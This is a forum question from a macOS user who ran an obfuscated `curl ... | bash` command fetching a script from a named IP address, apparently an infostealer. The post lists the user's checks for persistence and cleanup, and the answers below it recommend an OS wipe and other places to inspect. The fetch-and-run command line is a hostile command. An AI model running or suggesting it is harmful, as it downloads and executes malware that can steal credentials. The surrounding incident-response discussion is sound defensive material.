Hey all,
I messed up big time by running a command I found on GitHub in my macOS Terminal, thinking it was for a legit tool. It turned out to be a malicious script from a Russian IP (217.119.139.117).
The command I executed was something like: `curl -sL http://217.119.139.117/xxx | bash`, but it was obfuscated using Base64. A few days later, I got a message from Google about "suspicious activity" on my account, and they blocked my access after I changed all my passwords.
Here are the steps I've taken so far:
1. **Network Check:** I ran `lsof -i -P | grep -i "ESTABLISHED"`—didn't find any connections to that IP.
2. **Persistence Check:**
- Inspected `~/Library/LaunchAgents`—only found legit files.
- Checked `crontab -l`—no jobs were listed.
- Reviewed files in `~/.zshrc` and `~/.zprofile`—they're either clean or nonexistent.
3. **Process Kill:** Executed `killall -9 bash` to make sure any background scripts were stopped.
4. **Deep Scan:** I used **KnockKnock** from Objective-See and MalwareBytes; both found no threats and confirmed only signed binaries from verified developers.
5. **File Audit:** Ran `find ~ -mmin -60` to check for hidden files made by the script—nothing unusual outside standard logs.
Now, I have a few questions:
1. Are there other places on macOS where scripts run via `nohup bash &` might hide besides LaunchAgents?
2. Given that this was likely an Infostealer and may have compromised my Google passwords, what's the risk for my password managers?
3. Which macOS system logs (`log show`) should I check to see what files the script accessed?
4. Is a full OS wipe necessary even if KnockKnock and MalwareBytes didn't find anything?
Thanks for any technical advice. I'm trying to avoid a full wipe if I can confirm that the payload didn't establish persistence.
5 Answers
A lot of malware can hide in specific directories on macOS. Make sure to check places like `~/Library/LaunchAgents`, `/Library/LaunchDaemons`, and `~/Library/Application Support` for anything suspicious. These can often be where malicious files set up camp.
Never pipe commands directly from untrusted sources, it can lead to serious issues like this. Always review scripts first. Given the risks, a full wipe is likely your best bet to ensure complete safety.
Honestly, I'd recommend just wiping the OS completely. It’s the safest way to ensure that any hidden malware is completely gone. After that, change all your passwords everywhere and definitely enable two-factor authentication.
If you're unsure about what the script did, a full wipe is definitely the best route. Malicious scripts can operate stealthily, so it’s hard to know for sure if there's still something lurking around.
You should also look out for other sneaky spots like `/tmp` or `~/Library/Caches`. If you're manually hunting for malware, these are good places to investigate. Just remember to check the creation timestamps of any files—malware might try to mask its presence.
Related Questions
Can't Load PhpMyadmin On After Server Update
Redirect www to non-www in Apache Conf
How To Check If Your SSL Cert Is SHA 1
Windows TrackPad Gestures